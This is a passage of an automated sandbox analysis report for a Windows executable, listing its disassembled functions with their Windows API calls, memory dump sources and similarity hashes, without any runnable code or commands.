SetLastError.KERNEL32(00000000,001C1129), ref: 001F2E6F

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 087f4ec3083b42ea159a8d66198e971244720b6c72845ed0532481c96f8902b0
Instruction ID: 124fe56c696c221e24dcb034a45d9ce5f59eb1b42234aef833b7ab4236e33678
Opcode Fuzzy Hash: 087f4ec3083b42ea159a8d66198e971244720b6c72845ed0532481c96f8902b0
Instruction Fuzzy Hash: 1001A476245B0C7BC72267747C89D3B2A59ABE17A5B354129FB25A3293EB748C014120

Function 0022000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0021FF41,80070057,?,?,?,0022035E), ref: 0022002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0021FF41,80070057,?,?), ref: 00220046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0021FF41,80070057,?,?), ref: 00220054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0021FF41,80070057,?), ref: 00220064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0021FF41,80070057,?,?), ref: 00220070

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 3199e9e91416edd167a411ddc49391681d5dfe5def882292ffe088dafad479f7
Instruction ID: 4b2b28b2fd0e25cbbfd17d40a662a34bf0101d79633653d9b6c7dbabb8f7779d
Opcode Fuzzy Hash: 3199e9e91416edd167a411ddc49391681d5dfe5def882292ffe088dafad479f7
Instruction Fuzzy Hash: 8C01A272610325BFEB114FA8FC8CBAA7AEDEF44752F244124F905D2221E771DE508BA4

Function 0022E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0022E997
QueryPerformanceFrequency.KERNEL32(?), ref: 0022E9A5
Sleep.KERNEL32(00000000), ref: 0022E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 0022E9B7
Sleep.KERNEL32 ref: 0022E9F3

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: a9dccea230f491d3cb3012da9fe104b44c9967fbe596e97d220213b8cfdbf1a4
Instruction ID: b3094699a65f65844369cb9aa86aaed3f40a16c302ae3351fa485158e23da7aa
Opcode Fuzzy Hash: a9dccea230f491d3cb3012da9fe104b44c9967fbe596e97d220213b8cfdbf1a4
Instruction Fuzzy Hash: 32015B31C11739EBCF00AFE4E85D6DDBB78BF08701F114556E906B2241DB3495A4DBA6

Function 002210F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00221114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00220B9B,?,?,?), ref: 00221120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00220B9B,?,?,?), ref: 0022112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00220B9B,?,?,?), ref: 00221136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0022114D

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: a81b5988fbff8ebc1d90cdcd0aeff2ed299fb6e7b694084b92fb72dc74ef496f
Instruction ID: c4254b31f0055c6f113cff1c15946cbe57060cffd951ecb714a3097609df0ca1
Opcode Fuzzy Hash: a81b5988fbff8ebc1d90cdcd0aeff2ed299fb6e7b694084b92fb72dc74ef496f
Instruction Fuzzy Hash: 26011D75100715BFDB114FA5EC4DE6A3F6EEF89361B204425FA45D7350EA31DC20DA64

Function 00220FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00220FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00220FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00220FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00220FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00221002

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: f2fc54e24efa9ebf101fe06430db319662a6cac7905065b17bb8a05e5a705d68
Instruction ID: 11f16685e91e01b11c9d6c79ff0d1e18001bceb6f19736087f1bcdaa2e84d780
Opcode Fuzzy Hash: f2fc54e24efa9ebf101fe06430db319662a6cac7905065b17bb8a05e5a705d68
Instruction Fuzzy Hash: 67F04F35100315BFDB215FA5AC4DF5A3BADEF89762F204414F949C6291DA70DC508A60

Function 00221014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0022102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00221036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00221045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0022104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00221062

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: d270a073beb42a4b020c3eb3113029218302ca6d9e2addbf1d085c71762e48ae
Instruction ID: c6501fd083a06f2767cf2b9f076cce7fb1b2364056349fbc75b6b3cd9776b7c0
Opcode Fuzzy Hash: d270a073beb42a4b020c3eb3113029218302ca6d9e2addbf1d085c71762e48ae
Instruction Fuzzy Hash: B2F04F35100365BFDB215FA5FC4DF5A3BADEF89762F204414F945C6290DA70D9908A60

Function 0023030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,0023017D,?,002332FC,?,00000001,00202592,?), ref: 00230324
CloseHandle.KERNEL32(?,?,?,?,0023017D,?,002332FC,?,00000001,00202592,?), ref: 00230331
CloseHandle.KERNEL32(?,?,?,?,0023017D,?,002332FC,?,00000001,00202592,?), ref: 0023033E
CloseHandle.KERNEL32(?,?,?,?,0023017D,?,002332FC,?,00000001,00202592,?), ref: 0023034B
CloseHandle.KERNEL32(?,?,?,?,0023017D,?,002332FC,?,00000001,00202592,?), ref: 00230358
CloseHandle.KERNEL32(?,?,?,?,0023017D,?,002332FC,?,00000001,00202592,?), ref: 00230365

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: a4fccc5452159490f78d16a384c144c0f43a90fba9861f4a537c33d027e58697
Instruction ID: 822e9509586c9466a43eb0ce1f27c229c13f8eab7240f2efb1d9c27c5a6ec59e
Opcode Fuzzy Hash: a4fccc5452159490f78d16a384c144c0f43a90fba9861f4a537c33d027e58697
Instruction Fuzzy Hash: BA0190B2810B169FC730AF66D8D0416F7F9BF502153158A7ED19652931C371A964CE90

Function 001FD73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 001FD752

Part of subcall function 001F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001FD7D1,00000000,00000000,00000000,00000000,?,001FD7F8,00000000,00000007,00000000,?,001FDBF5,00000000), ref: 001F29DE
Part of subcall function 001F29C8: GetLastError.KERNEL32(00000000,?,001FD7D1,00000000,00000000,00000000,00000000,?,001FD7F8,00000000,00000007,00000000,?,001FDBF5,00000000,00000000), ref: 001F29F0

_free.LIBCMT ref: 001FD764
_free.LIBCMT ref: 001FD776
_free.LIBCMT ref: 001FD788
_free.LIBCMT ref: 001FD79A

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 268f8d9f082295f396226b1adf5a9e1c127577137cb86130754153f6df27be21
Instruction ID: c7081c9f518bd493ce0c41880d10a03698f80e95d29fc4e3e4d7e02d8b69a970
Opcode Fuzzy Hash: 268f8d9f082295f396226b1adf5a9e1c127577137cb86130754153f6df27be21
Instruction Fuzzy Hash: 3AF0623258161DAB8621FB64F9C6C3A77DEBB443187A40905F248EB511C730FC808770

Function 00225C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00225C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 00225C6F
MessageBeep.USER32(00000000), ref: 00225C87
KillTimer.USER32(?,0000040A), ref: 00225CA3
EndDialog.USER32(?,00000001), ref: 00225CBD

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 536c63331807d0198a8b9f0a217bec1009d94b4c55f6bc8e486c47a173056850
Instruction ID: dacd71816ff68465b3f23a32e3a250604c889c873e0e426fdbbe92058865b2fa
Opcode Fuzzy Hash: 536c63331807d0198a8b9f0a217bec1009d94b4c55f6bc8e486c47a173056850
Instruction Fuzzy Hash: D4018630510B24AFEB215F50FD4EFA677BCBB04B06F00455AB583A14E1FBF4AA948A94

Function 001F22A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001F22BE

Part of subcall function 001F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001FD7D1,00000000,00000000,00000000,00000000,?,001FD7F8,00000000,00000007,00000000,?,001FDBF5,00000000), ref: 001F29DE
Part of subcall function 001F29C8: GetLastError.KERNEL32(00000000,?,001FD7D1,00000000,00000000,00000000,00000000,?,001FD7F8,00000000,00000007,00000000,?,001FDBF5,00000000,00000000), ref: 001F29F0

_free.LIBCMT ref: 001F22D0
_free.LIBCMT ref: 001F22E3
_free.LIBCMT ref: 001F22F4
_free.LIBCMT ref: 001F2305

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 70169a9da54ccdb711db65d19e9a9fbd5730edd6e8a7c619f24f13eadd43bb1c
Instruction ID: 448cd381249e3199ac198f6f65bc59f7ceb6b3a59177402ad513217b6ea8f5a6
Opcode Fuzzy Hash: 70169a9da54ccdb711db65d19e9a9fbd5730edd6e8a7c619f24f13eadd43bb1c
Instruction Fuzzy Hash: 60F05EB588193A8F8713BF54BC498283B64FB28760710051BF918D73B1CB700921AFE4

Function 001D95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 001D95D4
StrokeAndFillPath.GDI32(?,?,002171F7,00000000,?,?,?), ref: 001D95F0
SelectObject.GDI32(?,00000000), ref: 001D9603
DeleteObject.GDI32 ref: 001D9616
StrokePath.GDI32(?), ref: 001D9631

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: fd0e244cb8873828d724151d34ddf51abd465a25f5fb1867fafa2e9ca3bc76c0
Instruction ID: e890abc361bfb7e2eed130ccb32d40065aeb1298079e2dd6344f879268f7ae3a
Opcode Fuzzy Hash: fd0e244cb8873828d724151d34ddf51abd465a25f5fb1867fafa2e9ca3bc76c0
Instruction Fuzzy Hash: 5AF0373100674AEFEB265F6AFD5CB683B61EB003A2F148226F429551F0D73189A5DF24

Function 001F0F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 001F10F9
__freea.LIBCMT ref: 001F1117

Part of subcall function 001F1537: _free.LIBCMT ref: 001F154F

Strings

am/pm, xrefs: 001F117A
a/p, xrefs: 001F11DE

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 1105c0dcdcaa5e1fe09cca2a3a5c15fddd65aa111e6a3729975c7df8f5a24b3d
Instruction ID: 03d7d3d7f528ce3b9a7cfd9ad0282f88b60f63974b1c781352d1d040fbed867b
Opcode Fuzzy Hash: 1105c0dcdcaa5e1fe09cca2a3a5c15fddd65aa111e6a3729975c7df8f5a24b3d
Instruction Fuzzy Hash: F4D1133190420EFADB289F68C855BFEB7B2FF15320F290159EB02AB651D7759D80CB91

Function 002461D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON

Download Yara Rule

APIs

Part of subcall function 001E0242: EnterCriticalSection.KERNEL32(0029070C,00291884,?,?,001D198B,00292518,?,?,?,001C12F9,00000000), ref: 001E024D
Part of subcall function 001E0242: LeaveCriticalSection.KERNEL32(0029070C,?,001D198B,00292518,?,?,?,001C12F9,00000000), ref: 001E028A

Part of subcall function 001E00A3: __onexit.LIBCMT ref: 001E00A9

__Init_thread_footer.LIBCMT ref: 00246238

Part of subcall function 001E01F8: EnterCriticalSection.KERNEL32(0029070C,?,?,001D8747,00292514), ref: 001E0202
Part of subcall function 001E01F8: LeaveCriticalSection.KERNEL32(0029070C,?,001D8747,00292514), ref: 001E0235

Part of subcall function 0023359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 002335E4
Part of subcall function 0023359C: LoadStringW.USER32(00292390,?,00000FFF,?), ref: 0023360A

Strings

x#), xrefs: 0024636F
x#), xrefs: 0024633A
x#), xrefs: 00246353

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
String ID: x#)$x#)$x#)
API String ID: 1072379062-3282413808
Opcode ID: 5b372a0e7a5a01a025457d28b4fd50bd9c8031c74cab460dd530416786f280dd
Instruction ID: bef4d96449f858e5bf1ec34e511ab0391caf5319eb5095d0b8917e9acbead975
Opcode Fuzzy Hash: 5b372a0e7a5a01a025457d28b4fd50bd9c8031c74cab460dd530416786f280dd
Instruction Fuzzy Hash: C0C1A171A10106AFCB28DF98C894EBEB7B9FF59300F14806AF9059B291DB70ED55CB91

Function 00222716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0022B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002221D0,?,?,00000034,00000800,?,00000034), ref: 0022B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00222760

Part of subcall function 0022B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002221FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0022B3F8

Part of subcall function 0022B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0022B355
Part of subcall function 0022B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00222194,00000034,?,?,00001004,00000000,00000000), ref: 0022B365
Part of subcall function 0022B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00222194,00000034,?,?,00001004,00000000,00000000), ref: 0022B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002227CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0022281A

Strings

@, xrefs: 00222832

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: f18aa66c3a3a682640f35443c3d805b2af87132992f6445e5088a3bb7932955f
Instruction ID: c971619a47e3806b753d3cb175723542f1ae7483b0d8d783c55c636b989552d1
Opcode Fuzzy Hash: f18aa66c3a3a682640f35443c3d805b2af87132992f6445e5088a3bb7932955f
Instruction Fuzzy Hash: D0415D72900228BFDB15DFA4DC85ADEBBB8EF05300F104095FA55B7181DB71AE59CB61

Function 001F172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\K3xL5Xy0XS.exe,00000104), ref: 001F1769
_free.LIBCMT ref: 001F1834
_free.LIBCMT ref: 001F183E

Strings

C:\Users\user\Desktop\K3xL5Xy0XS.exe, xrefs: 001F1760, 001F1767, 001F1796, 001F17CE

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\K3xL5Xy0XS.exe
API String ID: 2506810119-1076347692
Opcode ID: 5f80be5193eda022a67a830bd1b2039aa5c36ea0c063ff0f00ebdff1723d884b
Instruction ID: c32d8c5ccbf348834fa184c67f25358eb4b4f056bdca0a641bb5eb98ea4eef52
Opcode Fuzzy Hash: 5f80be5193eda022a67a830bd1b2039aa5c36ea0c063ff0f00ebdff1723d884b
Instruction Fuzzy Hash: BF31AE71E4025DFFCB21EB9A9985DAEBBFCEB95350F10416AFA0497211D7708E40CB90

Function 0022C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0022C306
DeleteMenu.USER32(?,00000007,00000000), ref: 0022C34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00291990,014E5D00), ref: 0022C395

Strings

0, xrefs: 0022C2DF

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 660105b0041a80d8bafe55902d7134f374393178bea8086178243cc0df4ff1b4
Instruction ID: 645ab0df0f497457a1a38a4995bac2af59e909a130e3845028833b177364d1c5
Opcode Fuzzy Hash: 660105b0041a80d8bafe55902d7134f374393178bea8086178243cc0df4ff1b4
